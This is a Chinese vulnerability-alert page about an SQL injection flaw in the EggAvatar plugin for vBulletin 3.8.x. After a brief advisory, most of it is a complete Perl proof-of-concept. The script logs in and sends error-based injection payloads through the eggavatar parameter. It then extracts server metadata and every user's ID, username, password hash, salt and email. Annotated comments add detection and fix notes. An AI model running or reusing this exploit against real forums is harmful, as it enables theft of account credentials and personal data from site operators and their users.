EggAvatar for vBulletin 3.8.x SQL注入漏洞漏洞预警 -电脑资料


   

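    vBulletin是一款著名的商业论坛程序。vBulletin 3.8.x 中的 EggAvatar 插件存在SQL注入漏洞,可能导致敏感信息泄露。从下文的PoC可以看出,注入点是已登录用户向 eggavatar.php 提交(do=addegg)的 eggavatar 参数,数据通过页面回显的 MySQL 错误信息读出。在插件修复之前,建议停用该插件,并关闭面向用户的数据库错误回显。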

EggAvatar for vBulletin 3.8.x SQL注入漏洞漏洞预警

    [+]info:

    ~~~~~~~~~

    EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability

    [+]poc:

    ~~~~~~~~~


    01#!/usr/bin/env perl

    02useLWP::UserAgent;

    # Prints the author's ASCII banner to STDOUT. No network activity happens here.
    03subbanner{

    04print"###################################\n";

    05print"############ DSecurity ############\n";

    06print"###################################\n";

    07print"# Email:dsecurity.vn[at]gmail.com #\n";

    08print"###################################\n";

    09}

    # Argument check: five positional arguments are required (target base URL,
    # forum username, forum password, number of user rows, delay in seconds).
    # With fewer, the usage text is printed and the script exits.
    10if(@ARGV<5){

    11print"Usage: $0 address username password number_user sleeptime\n";

    12print"Example: $0 http://localhost/vbb test test 10 10\n";

    13exit();

    14}

    # One shared HTTP client is used for every request in the script.
    # Detection note: the User-Agent header is set to the fixed string
    # "DSecurity", which can be searched for in web-server logs. It is a weak
    # indicator, since the string is a single literal in this listing.
    15$ua=LWP::UserAgent->new();

    16$ua->agent("DSecurity");

    # An in-memory cookie jar, so cookies set by the login response are sent
    # with the later requests.
    17$ua->cookie_jar({});

    # login(username, password): sends one form POST to <base>/login.php?do=login
    # with the supplied forum credentials. The response is stored in $res but
    # is not inspected in this sub.
    # NOTE(review): the script logs in before sending anything to eggavatar.php,
    # which suggests the vulnerable action needs an authenticated session.
    # Confirm this against the plugin source.
    18sublogin(@){

    19my$username=shift;

    20my$password=shift;

    21my$req= HTTP::Request->new(POST =>$ARGV[0].'/login.php?do=login');

    22$req->content_type('application/x-www-form-urlencoded');

    23$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");

    24my$res=$ua->request($req);

    25}

    # v_request(label, select, from, where, limit): sends one POST to
    # <base>/eggavatar.php and returns label . extracted value . "\n".
    # Arguments are read positionally from @_. Empty from/where/limit fall back
    # to 'information_schema.tables', '1' and '0'. The delay is taken from
    # $ARGV[4] and falls back to '10'.
    #
    # Defender summary of what this block shows:
    #  - Injection point: the `eggavatar` form field of the do=addegg action.
    #    The value sent contains a quote followed by SQL, so the plugin appears
    #    to place this field into a query without escaping or integer casting.
    #    The fix belongs in the plugin: cast the value to an integer or use a
    #    properly escaped or parameterized query.
    #  - Read-back channel: the value is recovered only from "MySQL Error" text
    #    in the HTTP response. Hiding database error details from clients
    #    removes that channel, but the injection itself remains until the
    #    plugin is fixed.
    #  - Detection: look for POSTs to eggavatar.php whose eggavatar value is not
    #    a plain number (quotes, SELECT, information_schema, comment markers).
    26subv_request{

    27#Declare

    28$print=$_[0];

    29$select=$_[1];

    30$from=$_[2];

    31$where=$_[3];

    32$limit=$_[4];

    33$sleep=$ARGV[4];

    34if($fromeq'') {$from='information_schema.tables';}

    35if($whereeq'') {$where='1';}

    36if($limiteq'') {$limit='0';}

    37if($sleepeq'') {$sleep='10';}

    38

    39# Create a request

    40my$req= HTTP::Request->new(POST =>$ARGV[0].'/eggavatar.php');

    41$req->content_type('application/x-www-form-urlencoded');

    # The caller's select/from/where/limit strings are interpolated into the
    # eggavatar value. uid and pid are sent as the constant 1.
    42$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");

    43# Pass request to the user agent and get a response back

    44my$res=$ua->request($req);

    45#print $res->content;

    # The third capture group of the error-text match becomes the returned value.
    46if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)

    47{$test=$3};

    # A pause follows every request, so the traffic is spread out in time.
    # Rate-based alerting alone may not flag it.
    48sleep($sleep);

    49return$print.$test."\n";

    50}

    # Main sequence: print the banner and advisory header, log in, then issue
    # one v_request per value and print each result.
    51&banner;

    52print"\n#############################################################################################################\n";

    53print"# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                #\n";

    54print"# Date:06-03-2011                                                                                          #\n";

    55print"# Author: DSecurity                                                                     #\n";

    56print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";

    57print"# Version: 2.3.2                                                                                           #\n";

    58print"# Tested on: vBulletin 3.8.0                                                                               #\n";

    59print"#############################################################################################################\n";

    60

    61#login

    62login($ARGV[1],$ARGV[2]);

    63#Foot print

    # Four requests read server metadata: version, data directory, database
    # user and database name.
    64printv_request('MySQL version: ','@@version');

    65printv_request('Data dir: ','@@datadir');

    66printv_request('User: ','user()');

    67printv_request('Database: ','database()');

    68#Get user

    # For each of the $ARGV[3] rows, one request reads the userid and five more
    # read usergroupid, username, password, salt and email from the `user` table.
    # Impact for defenders: the data exposed are account password hashes, salts
    # and e-mail addresses. If the request pattern described for eggavatar.php
    # shows up in the logs, treat these values as disclosed and plan password
    # resets. Each value costs one POST, so a run leaves 4 + 6 per user requests
    # to eggavatar.php in the access log.
    69for($i=1;$i<=$ARGV[3];$i++){

    70print"-----------------------------------------\n";

    71print$id= v_request('ID: ','userid','user','1',$i-1);

    72if($id=~ /(ID:)\s(.*)/){

    73printv_request('Group: ','usergroupid','user','userid='.$2);

    74printv_request('Username: ','username','user','userid='.$2);

    75printv_request('Password: ','password','user','userid='.$2);

    76printv_request('Salt: ','salt','user','userid='.$2);

    77printv_request('Email: ','email','user','userid='.$2);

    78}

    79

    80}

    [+]Reference:

    ~~~~~~~~~

    http://www.exploit-db.com/exploits/16934
